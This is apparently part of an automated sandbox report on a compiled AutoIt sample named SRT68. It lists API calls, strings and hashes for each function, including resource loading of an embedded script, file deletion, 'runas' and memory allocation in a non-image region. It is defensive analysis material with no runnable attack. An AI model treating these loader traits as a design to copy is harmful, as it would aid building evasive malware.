  • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
  • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
  • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
  • Part of subcall function 00FA434A: _memset.LIBCMT ref: 00FA4370
  • Part of subcall function 00FA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
Strings
• runas, xrefs: 00FDD33A
• This is a third-party compiled AutoIt script., xrefs: 00FDD279
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 529118366-3287110873
• Opcode ID: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
• Instruction ID: 4d5e202afb158beb9fd10a048aab9bbd6c6617ce790dcd9f1a8e34c8b23896c0
• Opcode Fuzzy Hash: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
• Instruction Fuzzy Hash: 18514AB1D0420AAECF21EFB5DC06EFD7BB9AF477A0F004059F491A6152CA795605FB21

Control-flow Graph

APIs
• GetVersionExW.KERNEL32(?), ref: 00FA49CD
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• GetCurrentProcess.KERNEL32(?,0102FAEC,00000000,00000000,?), ref: 00FA4A9A
• IsWow64Process.KERNEL32(00000000), ref: 00FA4AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FA4AE7
• FreeLibrary.KERNEL32(00000000), ref: 00FA4AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00FA4B23
• GetSystemInfo.KERNEL32(00000000), ref: 00FA4B2F
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
• Instruction ID: 0f679460154b689cd85d7bd419e1839f2c75ea18e975ef6d3025b304bca3b106
• Opcode Fuzzy Hash: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
• Instruction Fuzzy Hash: 919102719897C1DEC731DF6884502AABFF5AF6A310F58499ED0C683B02D264B908E769

Control-flow Graph

APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4EB0
• LoadResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD937
• SizeofResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD94C
• LockResource.KERNEL32(00FA4D8E,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F,00000000), ref: 00FDD95F
Strings
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
• Instruction ID: 96881683f966eceb3b9d2da17f78c40e3c01ed8ddbf2a5ad7e2853a9bb19d048
• Opcode Fuzzy Hash: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
• Instruction Fuzzy Hash: CD114CB5640701ABD7318F65EC88F677BBAEBC6B51F204268F44596250DBA2E8049660
APIs
• GetFileAttributesW.KERNELBASE(?,00FDE398), ref: 0100446A
• FindFirstFileW.KERNELBASE(?,?), ref: 0100447B
• FindClose.KERNEL32(00000000), ref: 0100448B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                      • Instruction ID: 34c455d664bfa9a2c399a00f8cf1703d80cca51428215897ba6fd0db01e847da
                                                                      • Opcode Fuzzy Hash: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
                                                                      • Instruction Fuzzy Hash: 17E0D8324105016752326E38EC0D4EE77AC9E06275F20474AF9B5C10C0EF7859048699
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0A5B
                                                                      • timeGetTime.WINMM ref: 00FB0D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00FB0E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00FB0EFA
                                                                      • DestroyWindow.USER32 ref: 00FB0F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB0F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00FE4E83
                                                                      • TranslateMessage.USER32(?), ref: 00FE5C60
                                                                      • DispatchMessageW.USER32(?), ref: 00FE5C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE5C82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                      • API String ID: 4212290369-3242690629
                                                                      • Opcode ID: bc34a68c52a1d2062eee4cb2ff83d070bf4cfc6b74d63080bc3df8950e87418c
                                                                      • Instruction ID: 9ed69ea58b8d705ba5c6a7cd149d6e952d11f22bf692b2d2850dc176d45392d7
                                                                      • Opcode Fuzzy Hash: bc34a68c52a1d2062eee4cb2ff83d070bf4cfc6b74d63080bc3df8950e87418c
                                                                      • Instruction Fuzzy Hash: DFB20270608782DFD734DF25C884BABB7E4BF85718F14491DE589872A1CB79E844EB82

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 01008F5F: __time64.LIBCMT ref: 01008F69
                                                                        • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                      • __wsplitpath.LIBCMT ref: 01009234
                                                                        • Part of subcall function 00FC40FB: __wsplitpath_helper.LIBCMT ref: 00FC413B
                                                                      • _wcscpy.LIBCMT ref: 01009247
                                                                      • _wcscat.LIBCMT ref: 0100925A
                                                                      • __wsplitpath.LIBCMT ref: 0100927F
                                                                      • _wcscat.LIBCMT ref: 01009295
                                                                      • _wcscat.LIBCMT ref: 010092A8
                                                                        • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FDE
                                                                        • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FED
                                                                      • _wcscmp.LIBCMT ref: 010091EF
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01009452
                                                                      • _wcsncpy.LIBCMT ref: 010094C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 010094FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01009511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009534
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0
                                                                      • Opcode ID: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                      • Instruction ID: d56839f5e9c8569490163cf2969622ac77bceab98d49c47ad5b2bf54d6d3b3eb
                                                                      • Opcode Fuzzy Hash: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                      • Instruction Fuzzy Hash: D0C15CB1D00219AEDF21DF95CC81EDEBBBDEF95304F0040AAE609E7181EB749A449F61

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                      • Instruction ID: b534c2f238e59b7e13bfa13bfdbc73700c3b9116f6ef83bab3c348fba4385b2b
                                                                      • Opcode Fuzzy Hash: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                      • Instruction Fuzzy Hash: 7A3136B184534AAFDB60CFA4E889A8DBBF0FB09390F24455EE5C0E6294D3BA0585CF51

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                      • Instruction ID: 05663aeea9b0575f46bdb8a5f8ecb068aea0fb94b649693cc358fbd26a8b5c61
                                                                      • Opcode Fuzzy Hash: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                      • Instruction Fuzzy Hash: 9421F4B1D00219AFDB20DFA4E888B9DBBF4FB08780F10411AF990E6294D7BA45448F91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00FA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010652F8,?,00FA37AE,?), ref: 00FA4724
                                                                        • Part of subcall function 00FC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA7165), ref: 00FC052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA71A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FDE8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FDE909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDE947
                                                                      • _wcscat.LIBCMT ref: 00FDE9A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: b46c266affbb35b4acf765e6b1694df7a127d7deb8a15dbf82ca9b644b5a61d3
                                                                      • Instruction ID: 45df1a56da4f13fe1dc6e028d76086493f71c4967623c37c0f4fdfc1421b97f0
                                                                      • Opcode Fuzzy Hash: b46c266affbb35b4acf765e6b1694df7a127d7deb8a15dbf82ca9b644b5a61d3
                                                                      • Instruction Fuzzy Hash: 5A7180B15093029EC324EF65EC81D9BBBF8FF89350F40052EF48587264DB7A9949DB92

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                        • Part of subcall function 00FA3041: GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                        • Part of subcall function 00FA3041: RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                        • Part of subcall function 00FA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                        • Part of subcall function 00FA3041: InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                        • Part of subcall function 00FA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                        • Part of subcall function 00FA3041: LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                        • Part of subcall function 00FA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                      • Instruction ID: b8c09096c28dac162b98c169cc3723757366c36f233ac24d838e4577b2799c0e
                                                                      • Opcode Fuzzy Hash: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                      • Instruction Fuzzy Hash: FC215AB1D0030AAFEB20DFA4EC09B9D7BB5FB09791F10011AF584A62A5D3BA5640DF94

                                                                      Control-flow Graph

                                                                      • Control-flow graph for the function at 00FA3633 (rendered graph not included; legend: Executed / Not Executed)
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00FA36D2
                                                                      • KillTimer.USER32(?,00000001), ref: 00FA36FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA372A
                                                                      • CreatePopupMenu.USER32 ref: 00FA373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 00FA374D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                      • API String ID: 1825951767-3513169116

                                                                      Control-flow Graph (graph figure not reproduced)

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015B0E79
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015B109F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0

                                                                      Control-flow Graph (graph figure not reproduced)

                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399

                                                                      Control-flow Graph (graph figure not reproduced)

                                                                      APIs
                                                                        • Part of subcall function 015B0A78: Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015B0C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: WH55CQ3Z3D38H4XQ8DXCFP2
                                                                      • API String ID: 2694422964-3364051605

                                                                      Control-flow Graph (graph figure not reproduced)

                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FDD3D7
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • _memset.LIBCMT ref: 00FA40FC
                                                                      • _wcscpy.LIBCMT ref: 00FA4150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449

                                                                      Control-flow Graph (graph figure not reproduced)

                                                                      APIs
                                                                        • Part of subcall function 00FA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                      • _free.LIBCMT ref: 00FDE263
                                                                      • _free.LIBCMT ref: 00FDE2AA
                                                                        • Part of subcall function 00FA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
